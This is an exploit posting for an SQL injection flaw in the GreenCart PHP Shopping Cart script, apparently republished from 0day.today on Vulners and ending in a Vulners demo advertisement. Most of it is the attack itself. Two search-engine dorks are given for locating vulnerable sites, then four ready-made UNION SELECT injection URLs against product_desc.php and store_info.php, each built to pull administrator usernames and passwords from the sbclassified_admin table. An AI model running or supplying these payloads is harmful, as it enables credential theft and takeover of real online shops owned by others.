GreenCart PHP Shopping Cart remote SQL injection vulnerability can reveal admin credentials.
===================================================================
GreenCart PHP Shopping Cart (id) Remote SQL Injection Vulnerability
===================================================================
|___________________________________________________|
|
| GreenCart PHP Shopping Cart (id) Remote SQL Injection Vulnerability
|
|___________________________________________________
|---------------------Hussin X----------------------|
|
| Author: Hussin X
|
|___________________________________________________
| |
|
| script : http://www.pozscripts.com/product_details.php?item_id=1
|
| DorK : inurl:classified/product_desc.php?id=
| DorK : inurl:classified/store_info.php?id=
|___________________________________________________|
Exploit:
www.[target].com/Script/product_desc.php?id=-118+UNION+SELECT+1,2,concat(admin_name,0x3e,pwd),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+FROM+sbclassified_admin--
www.[target].com/Script/store_info.php?id=-118+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,concat(admin_name,0x3e,pwd),18,19,20,21,22,23+FROM+sbclassified_admin--
www.[target].com/Script/product_desc.php?id=-118+UNION+SELECT+1,2,concat(admin_name,0x3e,pwd),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+FROM+sbclassified_admin--
www.[target].com/Script/product_desc.php?id=-118+UNION+SELECT+1,2,concat(admin_name,0x3e,pwd),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35+FROM+sbclassified_admin--
# 0day.today [2018-03-09] #
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo